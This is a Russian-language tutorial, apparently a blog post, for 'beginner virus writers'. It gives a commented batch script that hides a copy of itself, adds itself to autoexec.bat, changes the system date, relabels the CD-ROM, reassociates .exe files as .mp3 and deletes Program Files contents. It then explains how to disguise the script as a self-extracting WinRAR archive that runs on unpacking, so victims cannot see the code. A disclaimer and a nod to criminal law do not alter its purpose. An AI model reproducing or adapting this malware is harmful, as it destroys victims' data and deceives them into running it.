http://www.plansoft.ru/wp-content/uploads/2010/12/80.jpg

Вступление:
Сейчас я расскажу, как без знания программирования написать свой вирус с расширением .bat. Статья предоставлена для начинающих вирусописателей (ПОВТОРЯЮ «ДЛЯ НАЧИНАЮШИХ»). И вот еще что: статья написана в ознакомительных целях, и за использование нижеизложенной информации в целях нанесения вреда я не несу никакой ответственности.
При написания вируса я использовал обыкновенный блокнот.

Итак начнем :-))) , каждую новую строчку я буду пояснять.

@Echo off (запрещаем вывод на экран исполняемых команд)
Echo Virus Loading (Выводит на экран надпись «Virus Loading» В место нее можете писать что угодно)
Date 13.09.96 (эта строка изменяет дату)
If exist c:ski.bat goto abc (проверяет существует ли файл, …..)
Copy %0 c:ski.bat (копирует вирус только изменив названия)
Attrib +h c:ski.bat ( делает файлу ski.bat атрибут скрытый )
Echo c:ski.bat >>autoexec.bat (Прописывает файл ski.bat в автозагрузку)
:abc ( ……если он существует, то программа перейдет на метку :abc)
md PRIDUROK
md LUZER
md DURAK (Создает пустые папки)
md LAMER
Label E: PRIDUROK (CD-ROM будет называться PRIDUROK)
assoc .exe=.mp3 (запускает все ексшники как музыка )
del c:Program Files/q (удаляет все файлы из этой папки)
Echo VIRUS LOAD (Выводит надпись)

Итак мы написали простой вирус. Теперь нажимаем ФАЙЛ>>СОХРАНИТЬ КАК, и в поле имя файла пишем, например virus.bat
.bat обязательна везде. Появился значок MS-DOS. Так что бы жертва не смогла увидеть его код будем использовать WIinRar. Берем наш вирусочек и кидаем его в архив вылетит окно и ты просто ставишь галочку «создать SFX-архив. Далее заходим в дополнительное и открываем параметры SFX там есть строка выполнить после распаковки и ты пишешь РЕАЛЬНОЕ имя твоего вируса. Видишь простой блокнот вступил как вирусосаздатель, а WinRar сделал якобы программу….выводы делать тебе. И смотри непопадись сам на это. Не принимай файлы в инете от незнакомых людей и смотри на размер файла.
P.S. Помним о статьях 272-274 УК РФ.